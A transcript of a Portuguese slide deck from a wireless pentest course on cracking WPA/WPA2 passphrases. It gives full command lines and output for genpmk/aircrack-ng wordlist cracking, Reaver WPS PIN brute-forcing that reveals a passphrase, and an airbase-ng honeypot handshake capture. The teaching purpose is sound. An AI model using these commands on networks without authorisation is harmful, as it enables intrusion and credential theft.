WPA-WPA2
-
Upload
ronaldoejessica-costa -
Category
Documents
-
view
18 -
download
5
description
Transcript of WPA-WPA2
Wireless Pentest
WPA & WPA2
Instrutor
Marcos [email protected]
Wireless Protected Access
Um pouco mais de teoria…
WPA - Pre-Shared Key
WPA - Pre-Shared Key
Um pouco mais de teoria…
Um pouco mais de teoria…
Ataque WPA
Ataque WPA
Ataque WPA
Ataque WPA
Ataque WPA
Decriptando WPA - PSK
WPA2 - PSK
• Usa os mesmos princípios do WPA• A fraqueza é baseada na frase escolhida• Mais nada a ser dito !!!!!• Procedimento igual ao anterior
Acelerando o processo de Cracking
• Nós podemos pré-calcular a PMK para um dado SSID e uma wordlist usando a ferramenta genpmk
• genpmk -f /pentest/passwords/wordlists/darkc0de. lst -d PMK-Wireless-Lab -s "Wireless Lab“
• Vamos criar uma rede WPA-PSK com a senha skysign e capture o WPA-handshake desta rede
Acelerando o processo de Cracking
Meça o tempo levado com aircrack e compare…
Usando PMK com aircrack
Pyrit para sistemas MultiCPU
Como o Reaver funciona?
• Explora a vulnerabilidade no WPS – Wi-Fi Protected Setup (WPS)• Força bruta em PIN’s para relevar as senhas do WPA ou WPA2• Leva de 4 a 10 horas• Não funciona em todos os AP’s
Crackeando via Reaver1)airmon-ng start wlan02) airodump-ng mon0No outro terminal3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv
Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Switching mon0 to channel 11[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed (code: 0x02), re-trying last pin[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message
Crackeando via Reaverroot@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v
Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670
[+] Trying pin 00005678[+] Trying pin 01235678[+] Trying pin 11115670[+] Trying pin 22225672[+] Trying pin 33335674[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)[+] Trying pin 44445676[+] Trying pin 55555678[+] Trying pin 66665670[+] Trying pin 77775672[+] Trying pin 88885674[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)[+] Trying pin 99995676[+] Trying pin 00015677[+] Trying pin 00025676[+] Trying pin 00035675
Crackeando via Reaver• root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353
Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 11[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 22838353[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message
[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 3 seconds[+] WPS PIN: '22838353'[+] WPA PSK: 'DECADA1234'[+] AP SSID: 'multipinguim-2'[+] Nothing done, nothing to save.
Conectando a uma rede WPAwpa-supp.conf
Conectando a uma rede WPA
Cracking AP-less WPA Personal
• Para fazermos um crack no WPA precisamos do 4 handshake:– Authenticator Nounce, Supplicante Nounce, Authenticator MAC, Supplicant
MAC.– Só que para este ataque não precisamos de todos estes pacotes:
• Ou pacote 1 & 2 ou pacotes 2 & 3
• Para crackear precisamos então do WPA-PSK honeypot para então ele conectar-se, somente precisamos da msg 1 e msg 2.
• Não precisamos saber nenhuma frase secreta ;-)
Cracking AP-less WPA Personal
1) Configurando nosso honeypot airbase-ng -c 3 -a <AP> -e “Wireless Lab” -W 1 -z 2 mon0
2) Iniciamos o airodumpairodumo-ng -c 3 –bssid <AP> --write sem-AP-WPA-cracking mon0
3) Volte a tela do airbase e observe os clientes se associando4) Volte a tela do airodump e veja se pegou o WPA Handshake5) Rode o aircrack agoraaircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap